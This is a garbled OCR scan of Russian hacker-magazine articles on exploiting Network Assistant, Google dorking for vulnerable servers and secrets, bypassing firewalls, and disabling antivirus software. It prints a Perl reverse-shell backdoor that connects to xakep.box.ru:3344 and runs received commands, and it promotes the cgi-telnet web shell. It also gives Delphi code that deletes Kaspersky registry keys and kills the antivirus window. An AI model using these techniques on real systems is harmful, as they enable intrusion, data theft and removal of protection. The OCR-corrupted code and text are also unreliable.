80h байт можно запихать кучу кода, 
но к тому времени, как к нам перейдет 
управление, там будет мусор, а не 
дельный код. Поэтому и приходится 
размещать код по кускам, в тех мес- 
тах стека, в которые гарантированно 
не производится запись в процессе 
исполнения уязвимой процедуры. Мы 
обошлись всего тремя частями. Во 
второй части мы осуществляем раз- 
бор пакета, аналогично самому 


Network Assistant. Двигаемся по заго- 
ловку пакета, пока не дойдем до ос- 
новной части эксплоита, размещен- 
ной в пакете вместо текста сообще- 
ния. Вот на эту третью часть кода и 
передаем управление. Эта часть са- 
мая длинная, порядка нескольких ки- 
лобайт, но самого кода там всего-то 
несколько строк - поиск системной 
директории, запись в нее DLL (сер- 
верная часть) и собственно загрузка 
DLL в адресное пространство Network 
Assistant, после чего возвращается 
управление последнему. Далее в па- 
кете размещается серверная DLL, ко- 
торая создает отдельный поток для 
захвата пакетов из сети, анализа их 
на предмет пакетов от клиента. 


НЕВИДИМАЯ ЗАГРУЗКА 
ОСНОВНОГО КОДА ЭКСПЛОИТА 

и Управление захвачено. Самое время 
выполнить в процессе Network Assistant 
свой код. Можно писать базонезависи- 
мый код на Ассемблере, то есть без ис- 
пользования абсолютных адресов, но с 
каждым следующим килобайтом кода 
это занятие становится все более скуч- 
ным и утомительным. Поэтому мы пой- 
дем другим путем. Серверную часть 
оформим в виде DLL, которая будет заг- 
ружаться на зараженном хосте в адрес- 
ное пространство Network Assistant и ис- 
полняться в отдельном потоке. Конечно 
же, наблюдательный пользователь смо- 
жет заметить новый поток, но это ско- 
рее казуистика, чем реальный сюжет 
развития событий. В действительности 
никто не следит за количеством потоков 
в системе. В крайнем случае, можно 
просто скрыть присутствие в системе то- 
го или иного потока. 

Единственной проблемой может 
стать наличие одноименной DLL в ка- 
талоге назначения. Для преодоления 


этой трудности основной код эксплои- 
та должен уметь формировать случай- 
ные имена срайла, записывать на диск 
DLL сэтим названием и собственно 
загрузить новоиспеченную DLL в па- 
мять. Как уже было написано, мы пос- 
тупили следующим образом - сформи- 
ровали специальный пакет, состоя- 
щий из двух частей: код эксплоита и 
серверная DLL. Данный пакет с успе- 
хом проходит через любой cpaepBon, 
так как его невозможно отличить от 
родных пакетов Network Assistant. Да- 
лее он попадает в процедуру-парсер 
программы. Здесь есть маленький ню- 
анс - пакет должен быть адресован ка- 
налу, который точно не открыт на це- 
левом хосте, иначе парсер не сможет 
корректно обработать неправильный 
пакет и Насси повиснет, вместо того 
чтобы передать управление нашему 
коду. Для этого можно формировать 
случайные названия канала. 


СОКРЫТИЕ ОБМЕНА 
ИНФОРМАЦИЕЙ МЕЖДУ 
КЛИЕНТОМ И СЕРВЕРОМ 

и Как осуществлять обмен данными 
между клиентом и сервером? Сервер 
может открыть любой незанятый порт и 
слушать его, аналогично он может от- 
сылать на заранее оговоренный порт 
данные клиенту. Но это, в лучшем слу- 
чае, чревато возможностью столкнуть- 
ся с блокировкой портов на стороне за- 
раженного хоста, а в худшем - опас- 
ностью нашего обнаружения. Пораски- 
нув мозгами, приходим к выводу, что 
для связки клиент-сервер клиенту нич- 
то не мешает посылать пакеты на порт 
Network Assistant, а серверу - перехва- 
тывать все пакеты и выделять из них 
наши. Так как ключевой момент в про- 
токоле Network Assistant есть поле ID 
(тип пакета, смещение ОхО7), пробуем 
срормировать свои пакеты с ID, который 
не используется (например, ОхО8). Kpo- 
ме того, изучив парсер пакетов Насси, 
можно уверенно сказать, что пакеты с 
неиспользуемым ID будут игнориро- 
ваться без каких-либо замечаний. То 
есть Network Assistant их отбросит как 
неправильные, зато наш снисрер с ус- 
пехом их перехватит и обработает. Для 
того чтобы сервер не засветил наш IP- 
адрес, он должен отсылать широкове- 
щательные ответы на наши сообщения. 
Это немного нагрузит сеть, зато изба- 
вит нас от лишней гласности :). 


ЭТО КОНЕЦ... 

и Конечно, время не стоит на месте, и 
давно уже увидели свет новые версии 
Network Assistant. В последней версии 
- 3.2 - мы пока не нашли более-менее 
стоящих уязвимостей, и это радует, так 
как из-за небрежности авторов извест- 
ных программных продуктов не долж- 
ны страдать простые пользователи. А 
что самое главное, на примере этой 
версии ты получил представление о 
том, как осуществляется подход к ана- 
лизу и поиску уязвимостей в интернет- 
приложениях. Удачи! 
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ПОИСКОВЫЙ СЕРВЕР КАК ОРУЖИЕ ХАКЕРА 


ы проснулся рано вечером с непреодолимым желанием что-нибудь сотворить. Открыл почту, почитал bugtrag и на- 
шел парочку вполне подходящих дырок в популярных Web-qopymax или свежую дырку в Apache. Привычно запус- 
тив Nmap на поиск открытых 80-х портов, ты зашел Ha Google с целью найти сигнатуру для Nessus, ищущую эти дыр- 
ки. А зачем так все усложнять? 


овременные поиско- 


вые машины являются 


мощнейшим инстру- 


ментом, который мо- 


С помощью 
Google xa- 
керы ищут 
не только 
полезную 
информа- 
цию, HO и 
дырки. 


Хочешь 
постигнуть 
азы, читай 
труды 
Джонни 
Лонга - 
http://john- 
ny.ihack- 
stuff.com. 


жет быть использован 
в разных целях. В руках профессио- 
нала они легко могут превратиться в 
грозное оружие. Патриархом взлома 
с помощью Google (Google Hacking) 
принято считать Джонни Лонга 
(Johnny Long), автора руководства 
"The Google Hacker's Сшае", которое 
можно прочитать Ha его сайте 
http://johnny.ihackstuff.com. Весьма реко- 
мендуем периодически наведывать- 
ся туда в поисках новых "google- 
dorks" - поисковых запросов для 
Google, которые можно использо- 
вать для получения различной инте- 
ресной информации. 

Так как же поисковая машина может 
заменить привычный инструментарий 
хакера? 


ОПРЕДЕЛЕНИЕ ВЕРСИИ 
МЕВ-СЕРВЕРА 

и Запустив nmap с ключом -А, мож- 
но получить информацию о типе и 
версии НТТР-сервера на машине ис- 
следуемого объекта. Однако Google 
позволяет сделать это гораздо про- 
ще. Существует несколько методов 
определения версии сервера с по- 
мощью поисковых машин, самый 
распространенный из которых - ис- 
пользование содержимого сервера 
после установки и листингов дирек- 
торий. Многие web-cepBepb! (а иногда 
и операционные системы, устанавли- 
вающие web-cepsBep в составе стан- 
дартного набора дистрибутивов) пос- 
ле установки содержат стандартную 
страницу приветствия. Обычно на 
этой странице присутствуют ключе- 
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вые слова, по которым легко опреде- 
лить версию сервера. 

Например, введя в Google запрос 
intitle:Test.Page.for.Apache 
it.worked!, ты получишь список сер- 
веров, на которых установлен 
Apache 1.2.6 в конфигурации по 
умолчанию. "Конфигурация по 
умолчанию" тебе ни о чем не гово- 
put :)? Для того чтобы найти IIS 6.0, 
можно воспользоваться запросом 
intitle:-Under.Construction "Disabling 
Dynamic". И заметь: ты общался 
только с Google, ни один байт OT те- 
бя не дошел до сервера. 

Другой метод определения версии 
работает в том случае, если на сер- 
вере разрешен просмотр содержи- 
мого директорий. Серверы выдают 
список файлов в виде НТМ!-страни- 
цы, добавляя к ним заголовки, по 


ИНТЕРЕСНЫЕ ЗАПРОСЫ 


которым можно выяснить их вер- 
сию. Например, запрос 
intitle:index.of server.at позволяет 
вычислить серверы с установлен- 
ным Apache, а для поиска IIS nogxo- 
дит запрос "[То Parent Directory]" 
"‹аг>". Если убрать <dir>, получишь 
больше вариантов, но среди них бу- 
дет и больше ошибочных. 

Еще один полезный ресурс, о кото- 
ром не стоит забывать, - это Netcraft 
(www-.netcraft.com). Этот сервис исполь- 
зует технику remote fingerprinting 
для выяснения операционной систе- 
мы и версии служб на web-cepBepax. 
Однако пользоваться им для этих 
целей не очень удобно, поскольку 
он не позволяет искать серверы по 
операционной системе. И здесь на 
выручку приходит Google. Ниже при- 
ведены два запроса, позволяющие с 


#mysql dump filetype:sql - поиск дампов баз данных MySQL 
Host Vulnerability Summary Report - отчеты сканеров уязвимостей 
filetype:conf тиг:Ягема! -intitle:cvs - конфигурационные файлы 


фаерволов 


intitle:index.of Нпапсе$.х!$ - файлы с финансовыми отчетами 
inurl:ipsec.secrets holds shared secrets - секретные ключи 
ORA-00921: unexpected end of SQL command - поиск SQL Injection в 
Oracle 
_DBSELECTERROR: SELECT - поиск SQL Injection в MySQL 


СПОСОБЫ ПОЛУЧЕНИЯ ПАРОЛЕЙ 


Версия сервера Запрос 

Apache 1.3.0-1.3.9 | Intitle:Test.Page.for.Apache It.worked! this.web.site! 

Apache 1.3.11-1.3.26 | Intitle:Test.Page.for.Apache seeing.this.instead 

Apache 2.0 Intitle:Simple.page.for.Apache Apache.Hook.Functions 

Apache SSL/TLS Intitle:test.page "Hey, it worked !" "SSL/TLS-aware" 

IIS server intitle;welcome.to intitle:internet IIS intitle:"Under construction" "does not cur- 
rently have" 

15 4.0 intitle;welcome.to.lIS.4.0 

115 4.0 allintitle: Welcome to Windows NT 4.0 Option Pack 

15 4.0 allintitle:Welcome to Internet Information Server 

IIS 5.0 allintitle: Welcome to Windows 2000 Internet Services 

IIS 5.1 (XP) allintitle: Welcome to Windows XP Server Internet Services 

115 6.0 (2003) иЕе:Опаег.СопгисНоп "Disabling Dynamic" 

Netscape servers | allintitle:Netscape Enterprise Server Home Page 

Netscape server allintitle:Netscape FastTrack Server Home Page 


ang epe O ебя сервер 


помощью Netcraft через Google оп- 
ределить серверы, запущенные под 
IIS и Apache соответственно: 


Согласись, забавно получается: 
Netcraft следит за серверами, Google 
следит 3a Netcraft, а ты следишь за 
Google. 


GOOGLE - 3AMEHA XSPIDER 
Часто, прочитав об очередной 
уязвимости в php-nuke или другом 
насквозь дырявом приложении, заду- 
мываешься: а как же найти серверы с 
этой дыркой? Конечно, здесь могут 
помочь различные СС|-сканнеры, HO 


обычно они весьма медленно работа- 
юти не очень быстро обновляются. В 
отличие от них Google работает безот- 
казно. Предположим, сегодня появи- 
лась информация о дырке в админи- 
стративном интерфейсе РНР-Мике 

( 

). Зайдя Ha Google и введя зап- 
рос inurl:admin.php "Administration 
System Login", за 0.36 секунды nony- 
чаем 4300 ссылок на сайты, на KOTO- 
рых наверняка установлен РНР-Мике. 
Еще немного порыскав по 
security.nnov.ru, находим информа- 
цию 06 SQL Injection в PostNuke 
( 

). Привычно заходим Ha Google и 
вводим запрос inurl:index.php?mod- 
ule=subjects&func=viewpage&pageid. 
Щелкаем по первой ссылке и, изме- 
нив URL на www.server/index.php?mod- 


АВТОМАТИЗИРУЙ 


ule=subjects&func=viewpage&pageid=4 
3, получаем в ответ: 

Во время выполнения операции воз- 
никла ошибка: _DBSELECTERROR: 
SELECT postnuke_subpages.pageid ... 
AND postnuke_subpages.pageid=43 

И далее SQL injection со всеми оста- 
новками. 

Также Google может использовать- 
ся в качестве \ммеб-рег-программы, 
составляющей слепок содержимого 
web-cepBepa. Для этого достаточно 
ввести запрос site:server.com, кото- 
рый выведет все страницы, проиндек- 
сированные Google на этом сервере. 
В дальнейшем запрос можно уточ- 
нять, например, поискать директории, 
открытые для просмотра 
site:server.com intitle:index.of. 


КЭШ GOOGLE 
Иногда после клика по ссылке в 

поисковике сервер выдает ошибку 
404 (страница не найдена). Особенно 
бывает обидно, когда ссылка ведет на 
файл .htpasswd или ему подобный :). 
В этом случае нас может выручить 
кэш Google. Дело в том, что поиско- 
вая машина хранит копии ранее про- 
индексированных страниц, чем можно 
воспользоваться для восстановления 
удаленных с серверов файлов. 

Иногда информация в кэше Google 
отсутствует, и тогда можно прибег- 


нуть к другим поисковым серверам, Использо- 
например, Wayback Machine вание 
р р у Netcraft в 
( ). Здесь лежит содержи- связке с 
мое web-cepBepoB целиком, и это поз- Google - 
воляет увидеть, как выглядел тот или пои тота 
a увидеть, 9 роцентно 
иной сервер в определенное время. В действую- 
настоящий момент Wayback Machine ОИ 
содержит копии более 30 миллиардов ния версии 
(!) меб-страниц начиная с 1996 года. eee cep- 
Взлом с помощью Google - довольно ы 
интересное занятие, повышающее 
3CPCPEKTUBHOCTb работы с интернетом. 
Поиск новых запросов напоминает ре- 
шение кроссворда, когда ты выиски- 
Если требу- 


ваешь новые закономерности и пыта- 
ешься перевести их на язык поиско- 


емый файл 
уже стерли, 


вой машины. Используя Google, ты и в 
непременно ощутишь, какая мощь времени - 
заключена в этом неказистом, на пер- es 


вый взгляд, сервере. HE 
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Методы обхода межсетевых экранов 


Антиантивирус 
Как бороться с лечебным сортом 


Игра в прятки 
Как скрыть троян от умных юзеров 


Извращения с тетей 
Асей 
Warn-araka, (СО-черви и 
несанкционированные действия 


Одиссея программиста 
Краткий экскурс в троянмейкинг 


Немой укор за 
компьютерный хардкор 
Основы самомодисофикации и 
самообновления кода 


Like a Virus 
Вирусные технологии в троянах 


Windows - притон 
хакера 
Как создают плацдарм на 
взломанной машине 
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МЕТОДЫ ОБХОДА МЕЖСЕТЕВЫХ ЭКРАНОВ 


алограмотного хакера всегда останавливает фаервол. Если такой взлом- 

щик нашел неприкрытую брешь в WWW-cepsepe, но затем обнаружил, что 
в системе установлен брандмауэр, то он отступает. Так как не знает, что су- 
ществует масса способов удаленного обхода и выключения сетевого экрана. 


ипичная ошибка админа: уста- 
новив фаервол, он забывает 
о возможной опасности. Он 
думает, что брандмауэр защи- 
тит его систему от вторжений 
на 100%. Но ты-то так не думаешь, правда :)? 
Использовав всего одну роковую ошибку на 
публичном сервисе, взлощик может внед- 
риться в систему и слегка порулить ей. Если 
же присутствие фаервола его раздражает, 
ничто не помешает вообще вырубить его. 
Ибо нефиг порты закрывать :). 


ПЛАН А: ЛАЗЕЙКИ ЧЕРЕЗ WWW 

Самый популярный способ обхода меж- 
сетевых экранов - использование web- 
шелла. Этот прием активно используется 
среди *nix-xakeposB и быстро перекочевал к 
форточным взломщикам. Суть в следую- 
щем. Злоумышленник находит баг, позво- 
ляющий выполнять команду. Часто это уяз- 
вимый скрипт, плохо переваривающий па- 
раметры, реже - самопальный движок, ус- 
тановленный криворуким администрато- 
ром, или фатальный баг в самом IIS (или 
портированном Apache). 

После успешной эксплуатации атакующий 
получает право выполнить любую команду с 
полномочиями web-cepBepa. Ho, как правило, 
для полного удовлетворения этого недоста- 
точно - взломщик желает поднять привиле- 
гии GO максимума, залить сфайл, скачать цен- 
ную БД. К сожалению, запустить троянец 
или обычный бэкдор нереально - в системе 
установлен фаервол, фильтрующий все пор- 
ты, кроме системных. Такой расклад встреча- 
ется очень часто. Обычно неграмотному 
взломщику лень искать управу на брандмау- 
эр, поэтому он останавливается на WWW- 
бреши и переходит к поиску новой жертвы. 

Для обхода жестких фильтрующих правил 
поднимаются права прямо через WWW. Для 
этого придется воспользоваться каким-ни- 
будь проектом, который поддерживает вы- 
полнение команд, заливку и скачивание 
файлов прямо через браузер. Долго искать 
не придется, самый лучший скрипт - cgi-tel- 
net.cgi. Он выполнен в виде одного сфайла, 
поддерживает все необходимые функции, а 
также снабжен механизмом аутентисрикации. 
Словом, лучший выбор хакера. Изначально 
cgi-telnet поддерживал только *nix-cepBepa, 
но впоследствии разработчики адаптирова- 
ли сценарий и для виндовых web-cepBepoB. 
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ЗАЛИВАЕМ, ЗАПУСКАЕМ 

Прежде чем выбрать этот способ обхо- 
да, нужно убедиться, что на виндовой ма- 
шине установлен Рег|-интерпретатор. Чтобы 
проверить это, надо поискать на сервере 
сценарии с расширением .р! или .cgi. Если 
хотя бы один скрипт существует - интерпре- 
татор работает как надо. 


С И 


Теперь надо слить сценарий с 

на свой компьютер, отк- 
рыть его в любом редакторе и подготовиться 
к конфигурированию cgi-telnet. В первую 
очередь, нужно установить сложный пароль 
путем изменения переменной SPassword. 3a- 
тем перевести скрипт в виндовый режим ра- 
боты (SWinnt = 1). И, наконец, увеличить 
тайм-аут, если планируется выполнение дли- 
тельных операций: бэкап базы, перенос ката- 
логов, форматирование диска ;) и т.п. 

Самое время перенести готовый к работе 
сценарий на какой-нибудь ЕТР- или ТЕТР- 
сервер. Эту задачу - доставить скрипт на 
взломанную машину - можно выполнить 
различными способами, думаю, не стоит пе- 
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Обход сфаервола с помощью 
connback давно применяется 
в эксплоитах против [5а$$ и DCOM. 


речислять их: достаточно прочитать 
любую заплесневелую статью об 
эксплуатировании Упсоде-бага, и все 
станет ясно. Скачиваем срайл, затем 
перемещаем его в каталог /cgi-bin 
(путь к скриптовому каталогу можно 
узнать с помощью команды Cd без 
параметров) и травим на него своего 
ослика. При удачных обстоятель- 
ствах загрузится АЗС!-картинка с по- 
лем для ввода пароля. Забиваем па- 
роль, который указывали при редак- 
тировании сфайла, и мы внутри! 


На этот момент мы имеем полно- 
ценный М/\М/\М/-шелл с возможностью 
скачивания и заливки любого фай- 
ла. Ничто не мешает сочинить bat- 
срайл, поднимающий права и запус- 
кающий хакерское приложеньице. 
Можно обратиться к дамперу mysql- 
dump.exe, а затем быстренько ска- 
чать таблицы, наприме, с номерами 
кредитных карт клиентов. Самое 
главное, что никакой брандмауэр не 
воспрепятствует нам, а, следователь- 
но, и админ не будет тревожиться :). 


ПЛАН В: ДОВЕРИТЬСЯ ТРОЯНЦУ 
Бывает, что по каким-то причи- 
нам взломщик не может применить 
cgi-telnet. На сервере может отсут- 
ствовать Perl, поддержка исполне- 
ния сценариев через web и т.п. В 
этом случае ничего не остается, как 
написать свой троянец, организую- 
щий connect back на заранее объяв- 
ленный хост злоумышленика. 

Обход фаервола с помощью 
connback давно применяется в экспло- 
итах против Isass и DCOM. Суть меха- 
низма в следующем. Запуская троя- 
нец, атакующий активирует специаль- 
ную процедуру, которая сама соединя- 
ется с произвольным хостом и разре- 
шает выполнить любую команду на 
сервере. Даже если админ установил 
правило, контролирующее исходящий 
трасрик, фаервол пропустит коннект 
по причине того, что порождается он 
доверенным WWW-cepBepom. 

В инете по этой теме почти ничего 
нет, кроме эксплоитов к дырявым сер- 
висам. Поэтому проще написать свой 
бэкдор, организующий connect back. В 
качестве языка программирования я 
бы выбрал Рег. Потом можно порти- 
ровать проект в удобный ехе-файл, 
который запустится даже без присут- 
ствия интерпретатора. 

Система должна содержать клиент 
и сервер. Клиент будет запускаться с 
удаленной (взломанной) машины, а 
от сервера потребуется лишь ждать 
подключений на локальном компью- 
тере взломщика. Несмотря на неко- 
торую запутанность реализовать 
проект очень просто, к тому же, он 
занимает мало места. Изучив исход- 
ники троянца, без проблем можно 
написать аналогичную тулзу на 
C/C++ или даже на Delphi. 


КЛИЕНТ ВСЕГДА ПРАВ! 

Начнем с изучения клиента. Он 
будет запущен на удаленном сервере. 
После старта скрипт уйдет в бэграунд, 
подождет указанное число секунд, а 
затем соединится с сервером. Чуть 
позже сценарий будет ждать команды 
от хакера, а как дождется, выполнит 
ее и вернет результат. В случае если 
взломщик отправил некорректный 
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Отдых, который вам нужен 


ИГИДА АЭРО 


Т. 945 3003 
945 4579 


Лиц. ТД № 0025315 


АВЫ 
Т. 508 7962 
504 6508 


ATAKA HA WINDOWS 
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ЖЕСТОКОЕ УБИЙСТВО 


ш Если взломщик обладает привилегиями администратора и имеет 
право выполнять команды, ничто не мешает ему убить фаервол. 
Когда пакеты фильтрует персональный фаервол, его процесс вер- 
тится в специальной таблице. Убить службу можно с помощью ко- 
манды tskill имя_фаервола, предварительно узнав имя либо иден- 
тификатор утилитой tasklist (только для WinXP). 


и сметы 
Cepie “eeeqeges Boeeeere (100 | eed gece в eee ОТР” eee ec 
fears 


запрос, клиент вернет точное описа- 
ние ошибки. Просмотри исходный код 
самой главной части во врезке, и у те- 
бя отпадет большинство вопросов по 
алгоритму работы системы. 


#!/usr/bin/per| 
use 10::Socket; # Юзаем модуль 
10::Socket 


Если инте- Shost="xakep.box.ru"; # Хост, с которым 
рпретатор бэкдор будет соединяться 

Perl - 

И Sport=3344; # Удаленный порт 
удаленном Stime=20; # Время выжидания go осуще- 
сервере, 

Можно ис" ствления соединения 

пользовать $] ++; # Вырубим буферизацию 
Perl2exe. 


unless(fork) { # Уйдем в бэграунд 
sleep(Stime); # Засыпаем Ha п-секунд 
$sock=|0::Socket::INET- 
>new("'Shost:Sport") || die; # Соединимся 
или тихо умрем 
Strue=t; 
while(Strue) { # Пока сокет активен, 
ждем команд от хакера 
Sbuf=Ssock-recv(Scmd,128); 
chomp(Scmd); 
if (Sbuf) { 
Згеаду=`$ста` || print Ssock "$!\n": 
# Если пришла команда, выполним ее ли- 
бо обработаем ошибку 


Если соз- 


дать в ка- 
талоге /cgi- 
bin сцена- 
рий с рас- 
ширением 
bat, он без 
проблем 
выполнится 
при обра- 
щении к не- 
му с WWW. 


1 | 
use fOr -ВескаЕ : 
Phaat - local Бава: 
фраке = 21g: 
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РЕ! INT) = [OWORE : 

anleas fork 

ekeep Stam) i 
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ск эро Lok | 1): 

Peruse 1; 


thie; 
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Не забудь изменить хост и порт 
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Бывает, что фаервол загружен как сервис. В этом случае найди 
нужную службу, пропарсив вывод «net start», а затем прибей сер- 
вис запросом «net stop найденное _имя». 


Ready for connection on port 3344... 


lroot@wind4 dir 


Тон в устройстве Г имеет | Syeten 
Серийный номер тома; Е&РТ-10Я 


Содержимое папки F:\sof (Арго 


cOIR> 
cDIR 


15:49 
15:49 
4:34 
5:49 


[root@win]# ver 


06.09. 2005 
06.09. 2004 
06.09.2008 1 
06.09.2006 1 


- попок 


Microsoft Windows HP [Bepewa 5.1.2600] 


[root@win)# 


407 fire.pl 
412 server pl 


819 байт 
1 769 652 224 байт свободно 


Успешное укрощение фаервола 


Ssock->send("Sready"); # Вернем 
вывод от выполненной команды 
} else { 
Strue=0; # Если сокет закрылся, 
объявим его мертвым 
} 
} 
close(S$sock); #И корректно закроем 
дескриптор 


Для настройки клиента нужно ука- 
зать корректный хост и порт, а также 
вырубить собственный сфаервол (ина- 
че сценарий не приконнектится к уда- 
ленной машине). 

Теперь сервер. Его задача - открыть 
порт и ждать подключений, а затем 
интерактивно обрабатывать все необ- 
ходимые хакерские команды. Что ка- 
сается кода, то он очень похож на 
клиентскую часть, поэтому, надеюсь, с 
ним вопросов возникнуть не должно. 
Потребуется установить корректный 
порт, который совпадает с числом, за- 
писанным в Client.pl. 


Осталось откомпилировать кли- 
ент. Скачиваем конвертер perl2exe 
с www.indigostar.com/download/p2x-8.00- 
Win32.zip и передаем ему client.pl в 
качестве параметра. Если все в по- 
рядке, мы получим полноценное 
приложение, которое легко запус- 
тится на любой платформе. Посли 
заливки клиента на взломанную 
машину и запуска можно наслаж- 
даться результатом. 


ПЛАН С: СМОТРИ ПЛАНЫ АИВ 

ш Это основные способы обхода глу- 
пых фаерволов, применяемые среди 
хакеров-форточников. Помни, что ес- 
ли найти баг на WWW и успешно его 
проэксплуатировать, то обойти бранд- 
мауэр не составит большого труда. 
Исходники connback-npoekta лежат на 
http://kamensk.net.ru/forb/1/x/connback-bd.zip. 
Но помни, что этот материал написан 
только в целях ознакомления, а всю 
ответственность за возможные про- 
изведенные взломы несешь ты и 
только ты. SE 
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КАК БОРОТЬСЯ С ЛЕЧЕБНЫМ СОФТОМ 


ще Чарльз Дарвин писал о естественном отборе. Однако, с тех пор как ученый на своем могучем корабле «Бигль» 
бороздил мировой океан, прошло много времени, появились компьютеры, на них завелась разная живность, и 
живность эта... да, тоже начала бороться за выживание, которое приводит к эволюции вида :). 
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оведение каждой вре- 


доносной программы 


строго индивидуально, 


и скажодой новой раз- 


работкой наблюдать за 
выкрутасами программистов стано- 
вится все интересней и интересней. 
Редко можно встретить одинаковый 
набор методов борьбы с антивируса- 
ми и сокрытия своего присутствия на 
компьютере пользователя. 

Самым простым и действенным ме- 
тодом выживания является прямое 
убийство притивника. Трудно найти 
современного червя, который не дер- 
жал бы у себя длиннющий список 
имен запускаемых сфайлов самых 
распространенных антивирусов и Cpa- 
ерволов. Как только вредоносная 
программа прячется от пользователя 
из списка “Диспетчера задач" или 
любой другой аналогичной програм- 
мы путем установки глобального хука 
(обычно WH_GETMESSAGE) и перех- 
вата сфункций, ответственных за полу- 
чения списка запущенных процессов, 
или (что в последнее время встреча- 
ется чаще) прикрепляясь к какому-ни- 
будь процессу в виде плагина (99% 
регистрируются как Browser Helper 
Object или Extension к Internet 
Explorer), начинается серьезная игра. 
Первым шагом вредоносной програм- 
мы становится определение против- 
ника. В старые времена можно было 
просто получить список процессов и 
устранить авера. Но времена те ушли, 
и теперь антивирусы часто предстают 
нашему взыскательному взгляду в 
виде МТ-служб или драйверов. 

Да, задумка хороша, и создатели за- 
щит надеются на неприкосновенность 
своих детищ. Не будем им мешать, а 
лучше посмотрим, что тут можно при- 
думать. В идеале надо каким-то обра- 
зом получить права на доступ в свя- 
тая святых и только потом разворачи- 
вать полномасштабные действия. Но 
плох тот юзер, который не мечтает 
стать админом ;). Никто (ладно, есть 
исключения :)) не сидит под гостем у 
себя дома, да и на работе тоже мало 
кто извращается подобным образом. 
Так что считай доступ к службам и 
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дровам у шпиона уже есть, а если нет 
- даунлоад и применение эксплоита ре- 
шат эту маленькую неприятность. По- 
лучить список служб и драйверов мож- 
но через функцию EnumServicesStatus. 
Возвращаемый результат зависит от 
использованного Cpnara, отвечающе- 
го за тип службы. Чтобы получить ин- 
формацию о сервисах, надо исполь- 
зовать флаг SERVICE_WIN32. В буфер 
будет помещена информация о сер- 
висах, как работающих в своем про- 
цессе, так и делящих свое адресное 
пространство с другими службами 
(дело в том, что один исполняемый 
файл может содержать несколько па- 
раллельно работающих служб). Так- 
же интересно посмотреть и на загру- 
женные драйвера - SERVICE_DRIVER, 
многие сраерволы реализуются в ви- 
де драйверов-фильтров TCP/IP. Поми- 
мо срлагов EnumServicesStatus при- 
нимает в качестве параметров описа- 
тель на управление службами (его 
возвращает OpenSCManager) и ука- 
затель на буфер. Получив информа- 
цию о службе и ее handle, вредонос- 
ное творение может делать с антиви- 
русом или фаерволом что угодно 
(простой пример работы со службами 
на Delphi смотри на CD к этому номе- 
ру). Проблема SetServiceStatus реше- 
на! Можно остановить или приостано- 
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вить охранную деятельность и за- 
няться уже “полезной” работой. Если 
же служба вообще ненавистна, то 
DeleteService решит эту проблему. 
Все! Больше преград нет, а пользова- 
тель, скорее всего, даже и не заме- 
тит, что он остался один на один с не- 
изведанным врагом. Особо продвину- 
тые вредоносные творения могут по- 
местить свою иконку в трее, имити- 
руя убитую программу, и создать про- 
цесс с именем жертвы. 


подлости 

m К счастью, не всегда троянам при- 
ходится бороться за выживание на 
чужой территории. Бывают случаи, 
когда злоумышленнику лучше и на- 
дежней открыть доступ к компьютеру 
с помощью какой-нибудь маленькой, 
собственноручно сделанной троянс- 
кой бомбы. Вся идея этой программки 
сводится к временной нейтрализации 
систем защиты для получения более 
безопасного канала связи с исследуе- 
мой системой. Поскольку зверек не 
внесен в антивирусные базы, резких 
действий (вроде моментального отк- 
лючения антивируса/сфаервола) 
предпринимать не стоит. Достаточно 
прицепиться к какому-нибудь процес- 
Су и сделать пару-тройку обезоружи- 
вающих действий. Можно ограничить- 
ся правкой реестра. При желании 
можно создать небольшой список 
ключей известных средств защиты. 
Посмотрим внимательно на ветки 
HKCU\Software\Microsoft\Windows\Cu 
rrentVersion\Run u 
HKLM\Software\Microsoft\Windows\Cu 
rrentVersion\Run. Тут находятся все 
автораны для современных антивиру- 
сов и фаерволов. Для примера мо- 
жем попробовать отключить OGHY из 
версий KAV: 


= 


var hTemp:HKEY; 

begin 

if RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
'Software\Microsoft\Windows\CurrentVersio 
n\Run', 0, KEY_WRITE, hTemp) = ERROR_SUC- 
CESS then 

begin 

RegDeleteValue(hTemp,'KAVPersonal50'): 


RegCloseKey(hTemp); 
end; 


Для настоящего борца за чистоту 
оперативной памяти от лишних анти- 
вирусов не составит труда проинстал- 
лировать себе море лечебно-охрани- 
тельного сосфта и начать охоту за 
ключиками ;). Кстати, в реестре есть 
еще одно интересное место: 
HKLM\SYSTEM\CurrentControlSet\Ser 
vices - там хранится информация о 
сервисах. Можно немного поправить 
реестр и ждать перезагрузки. За ин- 
срормацию о сервисе КА\ отвечает 


наш взгляд, это слишком нестабильно 
и может быть заметно для пользова- 
теля. Зато посылка одного нужного 
сообщения может принести очень хо- 
роший эвфорект. 

Как-то раз, рассматривая получен- 
ное по почте “послание”, я заметил, 
что гость питает особые чувства к 
Panda. Пришлось поставить этот анти- 
вирус и посмотреть, что же будет 
дальше. Зверек сделал очень весе- 
лую гадость - провел что-то вроде 
Shatter-ataku :)! Он произвел замену 
заголовка Ha shell-Kog вида: 


H:=FindWindow(nil, 'Антивирус Касперско- 
го Personal’); 

postmessage(h, WM_NCDestroy, 0, 0); 

end; 


Причем предугадать последствия OT 
WM_NCDESTROY мне так и не уда- 
лось. Зависание/отключение авера - 
10/90. Довольно забавно смотреть на 
этот недочет. КА\/ предотвращает 
вмешательство в свой процесс 
(OpenProcess не срабатывает даже с 
SeDebugPrivilege привилегией), и 
службу нельзя остановить или приос- 
тановить, но одно сообщение может 


HKLM\SYSTEM\CurrentControlSet\kavs nop выключить антивирус и оставить 
vc. Сотрем ветку реестра Ha API: пор компьютер без защиты. Единствен- 
пор ный минус этой “атаки” - исчезнове- 
// Эту функцию надо объявить самим se ние значка в трее. 
function SHDeleteKeyA(hKey: HKEY; stupidfun: 
IpSubKey: PAnsiChar): Longint; stdcall;exter- nop OUTRO 
nal 'shlwapi.dll'; jmp stupidfun m Напоследок хочу открыть страш- 


ную тайну: защита от вирусов и чер- 
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begin и послал сообщение WM_Timer с ука- вей в 90% случаев лежит в первую О работе с 
SHDeleteKeyA(HKEY_LOCAL_MACHINE, зателем на начало кода. Panda впада- очередь на плечах создателя КАТ. файловыми 
'SYSTEM\CurrentControlSet\Services\kavsvc ет в ступор и больше не отвечает ни Только он может представить и оце- ый в 
у на что. При более внимательном рас- нить последствия от запуска неизве- Спеце «the 
end; смотрении гостя, я нашел onpegenu- стной программы или аттача. Ни один ИЯ 

тель версии пушистого медведя и со- современный антивирус не выловит (40), а руб- 
ответствующий список адресов для неизвестный ему вирус (существую- ре = 
Бывают, разумеется, случаи, когда атаки. щие эвристические анализы и эмуля- ра освеща- 
ждать нельзя или не хочется, да еще Схожую пакость можно проделать и торы кода остаются в зачаточном сос- ла эту тему 
